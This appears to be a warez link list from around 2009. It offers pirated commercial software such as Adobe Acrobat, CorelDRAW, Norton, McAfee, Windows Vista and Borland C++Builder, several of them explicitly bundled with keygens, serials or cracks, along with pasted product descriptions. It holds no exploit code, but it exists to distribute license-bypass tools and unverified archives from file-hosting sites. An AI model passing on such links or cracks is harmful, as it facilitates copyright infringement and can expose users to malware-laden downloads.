Adobe_Acrobat_Professional_v8_Full_Version_with_Keygen

http://uploading.com/files/AC7K8WQM/Adobe_Acrobat_Professional_v8_Full_Version_with_Keygen-[Demonoid.com]_6949383.9.torrent.html

McAfee.VirusScan.Enterprise.8.7i.Final.Retail+AntiSpyware Mo

http://uploading.com/files/99VOPPYI/+-Demonoid.com-+_McAfee_VirusScan_Enterprise_8_7i_Final_Retail_AntiSpyware_Modul_final_6949383.9.torrent.html

WinZip Pro v12.0.8252

http://mu-nl.co.cc/vault/101808/downloads/WinZip_Pro.html

Norton AntiVirus 2009 Gaming Edition 16.1.0.33

http://mu-nl.co.cc/vault/101808/downloads/NaG.html

Download Accelerator Plus (DAP) Premium v.v8.6.1.4

http://www.megaupload.com/?d=09QU9ZY0

Borland C++Builder 2007 Enterprise

http://rapidshare.com/files/143178626/radstudio.part01.rar
http://rapidshare.com/files/143118187/radstudio.part02.rar
http://rapidshare.com/files/143126304/radstudio.part03.rar
http://rapidshare.com/files/143134702/radstudio.part04.rar
http://rapidshare.com/files/143142804/radstudio.part05.rar
http://rapidshare.com/files/143151000/radstudio.part06.rar
http://rapidshare.com/files/143159317/radstudio.part07.rar
http://rapidshare.com/files/143167349/radstudio.part08.rar
http://rapidshare.com/files/143170768/radstudio.part09.rar

CorelDRAW Graphics Suite X4 - With Serial & Activation

http://www.corel.com/akdlm/6763/downloads/trials/GraphicsSuiteX4/CorelDRAWGraphicsSuiteX4Installer_EN.exe

crack : http://rapidshare.com/files/199024750/CorelDRAW.Graphics.Suite.X4Keymaker_Activation_esoft.in.rar

Free 18 months Watching All Showtimes Network channels

http://www.phpearth.com/showfile-21/jumpetv.rar

Website X5 Designer 5.7.7

WebSite X5 is a completely visual software: it does not require any HTML programming skills and it is the ideal tool for both home users and Web Designers who want to create and publish high quality websites with a professional look and feel.

In comparison with previous versions, WebSite X5 presents new interesting functions for the creation and customization of the site: editing functions for images, 3D buttons creation, intro possibilities, multi-language sites, HTML objects, e-mail sending forms, etc.
If you have a project in mind, a personal or company site, a digital photo album or an interactive presentation, WebSite X5 allows you in only 5 steps to pass from a simple idea to a complete and working website, already published and perfectly visible on the Web.

Step 1 - General Settings
Optimized Code for registration on Search Engines – Insert the requested information, also the Description and the Keywords: WebSite X5 automatically generates the code to allow Search Engines correctly indexing your pages.
Models – Browse the collection of more than 500 graphic models and select the one to apply to your site, with the color you prefer. If you imagine your site with a different look, create your graphics through the customized model and animate it with a Flash Animation.

Step 2 - Map Creation
Design and create the site map – Insert the levels and pages defining the menu and site articulation: you can set until 4 levels to organize an unlimited number of pages. You can modify the map in every moment and use it to move yourself among pages during the site creation phase.

Step 3 - Page Creation
Drag & Drop for multimedia page creation – Create every page through simple drag and drop of available objects: texts and images also with RollOver, Flash Animations, Video and Sound, Slide Show, Formatted Tables, Images Galleries, HTML Code, Data Sending Forms.
Editing Functions for the images – Edit the images rotating them, cutting the view area, correcting the regulations, setting filters and borders without using external graphical programs. WebSite X5 optimizes and converts automatically to JPG all imported images.

Create and share your photo albums – Select your best photos and create a Slide Show setting the graphics and selecting among the 50 different transition effects: share the memory emotion has never been so easy.
Enrich your pages of contents – Take advantage of the possibility of adding your HTML code to set a visitors counter and to show interesting contents to web navigators: news, weather forecast, work and estate offers, etc. WebSite X5 suggests you some free services and it is compatible with the AdSense program of Google.
Create form to send data – As simple as you manage the other objects, create a form to collect the data you want and make them be sent you by e-mail.

Step 4 - Advanced Settings
Create three-dimensional buttons – Customize the menus and create three-dimensional buttons through a proper editor defining also the mouseover effect.
Intro and multi-language sites – Set image, video or Flash Animation you want to view as site Intro, set a soundtrack and the links for language selection.
Reserved Area – Select the protected pages and create a reserved area to access to only with a password.

Step 5 - Site Export
Publish through an internal FTP – Publish the created site on-line directly from WebSite X5: you don't need any external FTP program to transfer all necessary files on the server to make immediately visible the site on the Web.

Download:http://www.maishare.com/rmmfqq38ila4/Website_X5_Designer_5.7.7.rar.html

Windows Vista Ultimate x64 SP1 [Integrated February]

http://rapidshare.com/files/199384835/Microsoft.Windows.Vista.ULTIMATE.x64.SP1.Integrated.February.2009.OEM.DVD-BIE.torrent

Portable Oxford Dictionary 11th Edition

This is the revised version of the CD-ROM for the world-famous Concise Oxford English Dictionary, 11th Edition. It contains over 240,000 words, phrases, and definitions, including all the latest new words. It offers rich vocabulary coverage, with full treatment of World English, rare, historical, and archaic terms, as well as scientific and technical vocabulary, and provides hundreds of helpful notes on grammar and usage.

This CD-ROM offers full-text search functionality, instant look-up from Windows documents, including email and the Web, high-quality spoken pronunciations for thousands of words, and interactive educational word games, making it ideal for family use as well as for homework and school use.

New to this edition is a fascinating “English Uncovered” supplement, revealing findings from the billion-word Oxford English Corpus and the behind-the-scenes dictionary research program. Find out how new words and meanings emerge, which are the most common words, and how the language is changing.
This dictionary also contains full appendices on topics such as alphabets, currencies, electronic English, and the registers of language, from formal to slang, plus a useful Guide to Good English with advice on grammar, punctuation, and spelling.

Download : http://uploadbox.com/files/OR5Org2vw2

PDF Password Remover 3.0 (Portable)

http://rapidshare.com/files/199203094/Portable_PDF_Password_Remover_3.0

Magic Speed v3.4 (2009)


Your PC is slow in boot-up and running? Magic Speed will make your PC faster and more efficient in 5 simple steps. The software package includes startup management, fixing registry errors, Disk clean-up, and memory management. It does not require special PC knowledge! Magic Speed will analyze your applications, which are loaded with your PC boot-up. Are you sure that you really need these applications? When loaded, they occupy PC memory and slow down PC operation. A check-up will also include virus and spyware tests thanks to a new anti-virus engine updated on a daily basis. Registry errors also negatively affect PC efficiency. By deleting temporary files, you will increase free space on your hard drive and speed up its operation. Make use of the unique Boost Windows option - by adding it to the startup you will discover a great improvement to your PC operation!

http://rapidshare.com/files/195963521/Magic_Speed_v3.4.rar

Norton AntiVirus 2009 16.0.0.125

Symantecs Norton AntiVirus 2009 - Winning protection against viruses, spyware, and other malicious threats! Heuristically detects Spyware threats, detects blocks Internet worm attacks, and protects email. Norton AntiVirus blocks viruses and spyware with advanced protection. It helps protect your entire computer by stopping viruses, spyware, and other security risks. Norton AntiVirus works in the background so you can surf the Internet, read the news, play games, and download software or music without disruption...

DOWNLOAD : http://www.easy-share.com/1903683157/Norton_AntiVirus_2009_16.0.0.125_spirkov.rar